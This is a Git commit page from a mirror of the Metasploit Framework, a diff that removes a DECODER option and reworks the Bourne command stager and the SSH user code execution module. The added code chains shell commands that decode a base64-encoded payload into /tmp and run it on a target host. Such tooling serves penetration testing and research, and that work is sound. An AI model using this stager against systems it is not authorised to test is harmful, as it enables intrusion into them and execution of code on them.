infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Remove the DECODER option

unstable
Spencer McIntyre 2013-03-08 15:25:16 -05:00
parent aceba9fc8a
commit 8b5a83c7f5
4 changed files with 22 additions and 69 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
lib/msf/core/exploit/cmdstager_bourne.rb
View File

@ -1,7 +1,4 @@
# -*- coding: binary -*- # -*- coding: binary -*-
##
# $Id: cmdstager_bourne.rb
##
require 'msf/core/exploit/cmdstager' require 'msf/core/exploit/cmdstager'
@ -16,49 +13,9 @@ module Exploit::CmdStagerBourne
include Msf::Exploit::CmdStager include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptEnum.new( 'DECODER', [ false, 'The decoding binary to use', 'auto', ['auto', 'base64', 'openssl', 'python', 'perl']]),
], self.class)
end
def create_stager(exe) def create_stager(exe)
Rex::Exploitation::CmdStagerBourne.new(exe) Rex::Exploitation::CmdStagerBourne.new(exe)
end end
def generate_cmdstager(opts = {}, pl = nil)
available_decoders = ['base64', 'openssl', 'python', 'perl']
opts.merge!({ :decoder => datastore['DECODER'] })
if opts[:decoder] == 'auto'
if self.respond_to? :execute_command_with_feedback
available_decoders.each do |bin|
which_result = execute_command_with_feedback("which #{bin}", opts).to_s
which_result = which_result.strip
if which_result.split.length == 1 and which_result.end_with?(bin)
opts[:decoder] = bin
break
end
end
end
if opts[:decoder] == 'auto'
print_error("Could not detect an appropriate decoder, try setting the DECODER option")
raise ArgumentError
else
print_status("Command Stager using auto-detected decoder: #{opts[:decoder]}")
end
end
if not available_decoders.include?(opts[:decoder])
print_error("Decoder must be one of #{available_decoders.join(', ')}")
raise ArgumentError
end
super
end
end end
end end

2
lib/msf/core/exploit/mixins.rb
View File

@ -1,5 +1,5 @@
# -*- coding: binary -*- # -*- coding: binary -*-
# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $ # $Id$
# #
# All exploit mixins should be added to the list below # All exploit mixins should be added to the list below
# #

29
lib/rex/exploitation/cmdstager/bourne.rb
View File

@ -1,7 +1,4 @@
# -*- coding: binary -*- # -*- coding: binary -*-
##
# $Id: bourne.rb
##
require 'rex/text' require 'rex/text'
require 'rex/arch' require 'rex/arch'
@ -21,6 +18,8 @@ class CmdStagerBourne < CmdStagerBase
def generate(opts = {}) def generate(opts = {})
opts[:temp] = opts[:temp] || '/tmp/' opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
super super
end end
@ -67,18 +66,20 @@ class CmdStagerBourne < CmdStagerBase
# Generate the commands that will decode the file we just created # Generate the commands that will decode the file we just created
# #
def generate_cmds_decoder(opts) def generate_cmds_decoder(opts)
case opts[:decoder] decoders = [
when 'base64' "base64 --decode #{@tempdir}#{@var_encoded}.b64",
decoder = "base64 --decode #{@tempdir}#{@var_encoded}.b64" "openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64",
when 'openssl' "python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64",
decoder = "openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64" "perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
when 'python' ]
decoder = "python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64" decoder_cmd = []
when 'perl' decoders.each do |cmd|
decoder = "perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64" binary = cmd.split(' ')[0]
decoder_cmd << "(which #{binary} >&2 && #{cmd})"
end end
decoder << " > #{@tempdir}#{@var_decoded}.bin" decoder_cmd = decoder_cmd.join(" || ")
[ decoder ] decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin"
[ decoder_cmd ]
end end
def compress_commands(cmds, opts) def compress_commands(cmds, opts)

17
modules/exploits/multi/ssh/sshexec.rb
View File

@ -1,3 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core' require 'msf/core'
require 'net/ssh' require 'net/ssh'
@ -12,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize def initialize
super( super(
'Name' => 'SSH User Code Execution', 'Name' => 'SSH User Code Execution',
'Version' => '',
'Description' => %q{ 'Description' => %q{
This module utilizes a stager to upload a base64 encoded This module utilizes a stager to upload a base64 encoded
binary which is then decoded, chmod'ed and executed from binary which is then decoded, chmod'ed and executed from
@ -88,16 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
def execute_command_with_feedback(cmd, opts = {})
begin
Timeout.timeout(3) do
feedback = self.ssh_socket.exec!("#{cmd}\n")
return feedback
end
rescue ::Exception
end
end
def do_login(ip, user, pass, port) def do_login(ip, user, pass, port)
opt_hash = { opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'], :auth_methods => ['password', 'keyboard-interactive'],